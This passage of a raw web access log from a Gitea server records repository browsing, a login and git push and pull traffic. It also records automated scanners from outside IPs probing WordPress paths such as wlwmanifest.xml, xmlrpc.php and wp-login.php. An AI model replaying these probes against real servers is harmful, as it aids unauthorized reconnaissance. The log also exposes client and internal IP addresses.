Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html%2Fassets" [Client 222.117.41.51] [Length 26048] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[18/Feb/2026:00:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js" [Client 222.117.41.51] [Length 13153] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html%2Fassets%2Fjs" [Client 222.117.41.51] [Length 27041] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[18/Feb/2026:00:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/i18n.js" [Client 222.117.41.51] [Length 29329] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html%2Fassets%2Fjs%2Fi18n.js" [Client 222.117.41.51] [Length 27041] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 989] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[18/Feb/2026:01:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 5780] [Gzip 2.38] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 222.117.41.51] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-auto.css?v=1.25.3" [Client 222.117.41.51] [Length 4323] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 222.117.41.51] [Length 55932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 222.117.41.51] [Length 88858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 222.117.41.51] [Length 5100] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 222.117.41.51] [Length 220214] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 222.117.41.51] [Length 4136] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 222.117.41.51] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2f" [Client 222.117.41.51] [Length 4965] [Gzip 2.37] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11646] [Gzip 4.91] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 222.117.41.51] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[18/Feb/2026:01:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11646] [Gzip 4.91] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[18/Feb/2026:01:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20344] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[18/Feb/2026:01:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html" [Client 222.117.41.51] [Length 17365] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html" [Client 222.117.41.51] [Length 21742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html?only_content=true" [Client 222.117.41.51] [Length 31032] [Gzip 11.28] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/html/assets?sub_path=" [Client 222.117.41.51] [Length 4334] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets?only_content=true" [Client 222.117.41.51] [Length 3999] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/html/assets/js?sub_path=" [Client 222.117.41.51] [Length 1021] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js?only_content=true" [Client 222.117.41.51] [Length 3241] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/script.js?only_content=true" [Client 222.117.41.51] [Length 9406] [Gzip 7.10] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:21:26 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[18/Feb/2026:01:21:26 +0000] - 401 401 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 13] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[18/Feb/2026:01:21:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 235] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[18/Feb/2026:01:21:35 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-receive-pack" [Client 222.117.41.51] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[18/Feb/2026:01:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 417] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[18/Feb/2026:01:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20350] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[18/Feb/2026:01:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer" [Client 222.117.41.51] [Length 12440] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=512" [Client 222.117.41.51] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[18/Feb/2026:01:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20354] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[18/Feb/2026:01:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/8c1bb50f683d14c46b66c56f1782d3cd0b0949c6" [Client 222.117.41.51] [Length 23507] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:22:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 14] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[18/Feb/2026:03:30:46 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 45.92.1.85] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:03:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 45.92.1.85] [Length 13773] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:03:30:47 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9359] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:03:30:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//xmlrpc.php?rsd" [Client 45.92.1.85] [Length 9346] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:03:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 45.92.1.85] [Length 13773] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:03:30:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//blog/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:03:30:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//web/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9365] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:03:30:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wordpress/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9371] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:03:30:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//website/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:03:30:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wp/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9364] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:03:30:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//news/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:03:30:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//2018/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:03:30:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//2019/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:03:30:51 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//shop/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:03:30:51 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wp1/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9365] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:03:30:51 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//test/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:03:30:51 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//media/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9367] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:03:30:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wp2/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9365] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:03:30:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//site/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:03:30:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//cms/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9365] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:03:30:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//sito/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" -[18/Feb/2026:03:30:53 +0000] - - 400 - - https git.hanmocnn.co.kr "-" [Client 45.92.1.85] [Length 0] [Gzip -] [Sent-to ] "-" "-" -[18/Feb/2026:04:35:42 +0000] - - 301 - GET http git.hanmocnn.co.kr "/wp-login.php" [Client 165.227.165.121] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:04:35:43 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/wp-login.php" [Client 165.227.165.121] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:08:31:18 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[18/Feb/2026:08:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[18/Feb/2026:08:31:18 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-upload-pack" [Client 222.117.41.51] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[18/Feb/2026:14:28:13 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[18/Feb/2026:14:28:13 +0000] - 401 401 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 13] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[18/Feb/2026:14:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 235] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[18/Feb/2026:14:28:20 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-receive-pack" [Client 222.117.41.51] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[18/Feb/2026:14:28:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; 